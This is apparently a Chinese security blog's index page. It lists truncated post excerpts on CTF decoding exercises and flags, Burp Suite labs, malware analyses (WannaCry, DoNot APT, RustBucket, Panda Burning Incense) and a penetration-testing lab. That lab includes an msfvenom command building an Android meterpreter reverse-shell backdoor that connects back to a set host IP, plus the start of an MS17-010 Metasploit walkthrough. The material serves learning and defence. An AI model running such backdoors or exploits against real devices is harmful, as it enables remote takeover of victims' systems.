解码小练习

解码小练习1 ZmxhZzR7OWNiOTExMTd9 Base64格式 flag4{9cb91117} 解码小练习2: %66%6c%61%67%7b%55%52%4c%20%65%6e%63%6f%64%69%6e%67%2f%66%6c%61%67%2e%70%68%70%7d URL格式 flag{URL encoding/flag.php&#...

发布于 加解密

Saber-Web

实验1:使用Burp拦截并查看访问 http://124.70.71.251:47392/ 的HTTP请求包。 实验2:手动修改浏览器标识User-Agent 先访问 http://ip.tool.chinaz.com Burp开启拦截 刷新页面 拦截到了请求包 找到User-Agent字段,进行修改 Mozilla/5.0 (Linux; Android 1...

发布于 攻防世界Web

渗透实验基础

使用MSFVENOM生成后门 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.189.184 LPORTS=4444 >1.apk LHOTS = 攻击源主机IP LPORTS = 默认端口号 后门漏洞 -l─# msfvenom -p android/meterpreter/reverse_tcp LHOST=1...

发布于 渗透测试

渗透实验基础

Windows 实验使用 ms17-010漏洞 使用环境 测试:Windows7 64 攻击:kali linux 基本步骤 1.保持宿主机和肉鸡可以ping通 扫描手段如下: 漏扫 -lsf6 > search ms17_010 Matching Modules ================ # Name ...

发布于 渗透测试

永恒之蓝

介绍 WannaCry勒索病毒 通过windows操作系统漏洞EternalBlue永恒之蓝 发起攻击。3月14 微软已经发布补丁,由于很多受害者没有及时安装补丁,导致被病毒攻击,计算机中的文件被加密。 断网分析 该病毒需要断网分析,分析时候,如果目标服务器存活,会进行网络通信,发送网络请求。这样做会导致,一方面攻击者知道你的出口ip,可以实施物理攻击!另外一方面,攻击者会关闭服务器或者...

发布于 恶意代码分析

Do Not APT针对南亚使用Android恶意软件的个人

执行摘要 最近,CYFIRMA观察到对居住在印度克什米尔的一个人的网络攻击。CYFIRMA研究团队从受害者手机的下载文件夹中收集了两件恶意软件。样本分析将这次攻击与DoNot APT联系起来,DoNot APT历来在该地区非常活跃。 介绍 受害者手机下载文件夹中收集的恶意软件暗示威胁行为者使用了第三方文件共享网站,导致文件被下载并保存在移动设备上的主下载文件夹中。 威胁行为者还开发了自己...

发布于 Android 软件逆向

BlueNoroff APT组使用“RustBucket”恶意软件针对macOS

了解Jamf Threat Labs发现的名为“RustBucket”的macOS恶意软件变体。它的作用,它如何破坏macOS设备,它来自哪里,以及管理员可以做些什么来保护他们的苹果车队。 Jamf Threat Labs发现了一个macOS恶意软件系列,该系列与命令和控制(C2)服务器通信,以下载和执行各种有效负载。我们以“RustBucket”的名义跟踪和保护这个恶意软件家族,并怀疑它归...

发布于 Mac 软件逆向

攻防世界web-Training-WWW-Robots

题目场景 从该链接中 http://61.147.171.105:49828获取flag 访问该服务器下面的使用rebots.txt文件获取信息 然后输入 /fl0g.php获取flag flag:cyberpeace{5cba64e1e7989b9a633175526a83302e} QA: 网站的 robots.txt 可以访问么? robots.txt文件是一个网站中的...

发布于 攻防世界Web

Android基于自然语言模型生成交流模型

步骤 收集和清洗数据 收集数据:您可以通过爬虫、问卷调查、社交媒体等方式来收集文本数据。 清洗数据:清洗数据是为了去除一些不必要的信息、过滤掉噪声数据等。常见的清洗方法包括去除HTML标签、去除停用词、去除重复数据等。 建立词汇表 将文本转化为数字:使用分词器对文本进行分词,并将每个单词表示成唯一的数字编码。 建立词汇表:建立一个词汇表,存储所有单词和它们对应的数字编码。 ...

发布于 Android开发

熊猫烧香

1.样本概况 病毒名称:C:\Users\15PB\Desktop\spo0lsv.vir 大小: 30001 bytes 修改时间: 2018年7月14日, 8:40:21 MD5: 512301C535C88255C9A252FDF70B7A03 SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870 CRC32: E334747C 病毒行为: V...

发布于 恶意代码分析
123458